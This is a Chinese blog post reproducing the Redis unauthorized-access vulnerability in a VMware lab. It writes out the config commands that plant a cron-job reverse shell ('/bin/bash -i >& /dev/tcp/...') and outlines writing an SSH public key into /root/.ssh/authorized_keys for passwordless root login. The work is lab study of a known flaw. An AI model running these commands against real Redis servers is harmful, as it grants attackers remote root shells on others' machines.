redis未授权访问漏洞

已于 2022-10-17 11:45:00 修改
阅读量392 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: redis 网络 linux
于 2022-10-16 16:00:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhscxj/article/details/127318247
版权

redis未授权访问漏洞的成因和危害

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

漏洞的验证以及演示过程

在这里插入图片描述

在这里插入图片描述

漏洞的验证以及利用过程

在这里插入图片描述
config set dir /var/spool/cron
设置写入的目录,此目录为linux存放本地任务计划的目录

config set dbfilename root
设置写入的文件名

set aabb "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.247.130/1234 0>&1\n\n"
设置写入的内容,反向连接192.168.247.130的1234端口

redis安装过程

相关文章

我这里是在VMware中弄了一个centos7和一个kali来进行实验复现

centos7已经运行redis

在这里插入图片描述
kali这边也安装了redis

在这里插入图片描述
通信也是正常的,防火墙也关闭了

在这里插入图片描述
攻击机kali通过无密码连接成功

在这里插入图片描述
执行info,执行成功,可以利用

在这里插入图片描述
设置写入文件的路径(linux启动项),以及文件名

在这里插入图片描述
kali开启nc监听

在这里插入图片描述
这里收到了会话,查看任务计划,反弹shell成功

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述在这里插入图片描述

通过shell在对方root目录下创建一个隐藏文件夹

(若是目标使用过ssh服务,则会自动生成/root/.ssh文件目录,若使用过就通过任务计划反弹的shell创建)

在这里插入图片描述

清空黑客机本机root下的.ssh文件的内容,如果没有.ssh文件则在黑客机本机的root目录下创建.ssh文件

在这里插入图片描述

进入.ssh文件通过命令ssh-keygen -t rsa在本地生成公钥对
id_rsa为私钥,id_rsa.pub为公钥

在这里插入图片描述
在这里插入图片描述

将公钥写入txt文件

在这里插入图片描述

将公钥中的内容作为值写入到hack中,写入redis

在这里插入图片描述
更改redis备份路径为ssh公钥存放的目录,(一般默认为/root/.ssh),生成authorized_keys文件

在这里插入图片描述
在黑客机免密登录目标机

在这里插入图片描述

在这里插入图片描述

深白色耳机
关注
专栏目录
漏洞检测与防御:Redis授权访问漏洞复现
Liu_Bruce的博客
04-21 2026
漏洞检测与防御:Redis授权访问漏洞复现 1. 授权访问漏洞 授权访问漏洞可以理解为安全配置、权限认证、授权页面存在缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库、网站目录等敏感信息泄露。目前存在授权访问漏洞的服务主要包括:NFS 、Samba、LDAP、Rsync、FTP、GitLab、Jenkins、MongoDB、Redis、ZooKeeper、ElasticSearch、Memcache、CouchDB、Docker、Solr、Hadoop等,使用时要注意。本文复现Redi
分布式平台下的HS(High-Security) --Shiro 认证
weixin_33834628的博客
06-01 112
认 证   认证是核实用户身份的过程。也就是说,当用户使用应用进行认证时,他们就在证明他们就是自己所说的那个人。有时这也理解为“登录”。它是一个典型的三步骤过程。   1、收集用户的身份信息,称为当事人(principal),以及身份的支持证明,称为证书(Credential)。   2、将当事人和证书提交给系统。   3、如果提交的证书与系统期望的该用户身份(当事人)匹配,该用户就被...
关于使用HSAF框架报错
dingding_p的博客
03-03 3961
如果在程序中报下面这个错,问题一般不在这,应该看最下面使项目启动失败的原因。 org.springframework.beans.factory.BeanCreationNotAllowedException: Error creating bean with name 'sqlSessionFactory': Singleton bean creation not allowed while singletons of this factory are in destruction (Do not
SpringBoot项目构建定时任务
05-17
SpringBoot项目构建定时任务,简单有效,可构建多个定时任务同步执行。
02-Redis授权访问漏洞
qq_57410330的博客
07-16 1007
详谈redis授权访问漏洞,原理、利用及加固方式
Redis授权访问漏洞
qq_57163799的博客
08-18 822
利用redis获取主机权限的三种方式,通俗易懂、简单直接、快速有效!!!
Redis授权访问漏洞复现
weixin_55123346的博客
06-26 1261
Redis漏洞复现
redis 授权访问漏洞
weixin_60719780的博客
03-02 2141
Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务。
redis授权访问漏洞复现
zkaqlaoniao的博客
06-27 502
攻击者在授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,攻击者还可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务器登录目标服务器(1) Redis绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务。
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
redis 授权访问漏洞详解
m0_69043895的博客
04-22 1419
1、redis 绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网。2、没有设置密码认证(默认密码为空),可以免密码远程登录redis服务。
Redis: 持久化之RDB和AOF
Wang的专栏
09-29 1089
Redis 有一个高质量的课题:数据安全性与数据可靠性Redis 是一个内存型数据库,数据大部分都是存在内存里面当信息在内存中流通时,Redis 节点突然就故障挂掉当重新启动的时候,内存中的数据肯定是全部丢失了如果在这种情况下,Redis 提供了对应的持久化方案,它有两种持久化方案RDB和AOF可以把内存中的数据保存到磁盘,避免数据的流失关于RDB,我们需要了解到什么是持久化什么是快照RDB的工作原理,包括它的优点和缺点关于AOF,需要知道为什么需要有AOF。
Redis-持久化
qq_74812898的博客
09-28 1026
redis持久化
Redis-常见数据类型(修改ing)
qq_74812898的博客
09-29 1031
redis常用数据类型
如何使用Redisson的布隆过滤器?
最新发布
付聪
10-02 345
【代码】如何使用Redisson的布隆过滤器?
尚硅谷redis147答疑 redis源码redisObject dict
2401_86733530的博客
09-28 641
总结:虽然在`redisObject`的结构定义中没有直接看到`dict`,但在实际使用中,对于哈希类型的对象,`redisObject`的`ptr`字段会指向一个`dict`结构。- 当Redis创建一个哈希对象时,它会创建一个`redisObject`,将其`type`设置为哈希类型,然后`ptr`指向一个新创建的`dict`结构。- Redis使用了一种灵活的设计,`redisObject`的`ptr`字段可以指向不同类型的数据结构,包括但不限于`dict`。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值